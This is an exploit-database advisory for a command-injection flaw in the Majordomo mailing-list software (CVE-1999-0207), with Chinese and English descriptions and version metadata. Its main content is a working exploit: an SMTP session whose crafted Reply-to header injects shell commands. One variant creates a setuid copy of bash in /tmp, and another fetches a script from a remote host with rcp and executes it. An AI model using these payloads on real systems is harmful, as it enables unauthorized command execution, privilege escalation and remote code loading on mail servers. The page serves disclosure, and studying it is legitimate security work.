https://www.exploit-db.com/exploits/20597
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199406-003

Majordomo是一个流行的用Perl实现的(majordomo.pl)处理邮件列表的软件。1.94.3版本以下的Majordomo对邮件地址未做充分过滤，远程攻击者通过构造特殊的邮件地址可以在服务器上以Majordomo用户的权限执行任意命令。

source: http://www.securityfocus.com/bid/2310/info

Majordomo is a perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files. 

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp${IFS}/bin/bash${IFS}/tmp/lord&&/bin/chmod${IFS}4777${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\@kappa.ro

LISTS
.
quit
--end of exploit --

For the remote users, change the Reply-to field to something like:

Reply-to: a~.`/usr/bin/rcp${IFS}[email protected]:script${IFS}/tmp/script&&source${IFS}/tmp/script`.q~a/ad=cucu/c=blu\@kappa.ro

VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:great_circle_associates:majordomo:1.90*cpe:/a:great_circle_associates:majordomo:1.91*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0207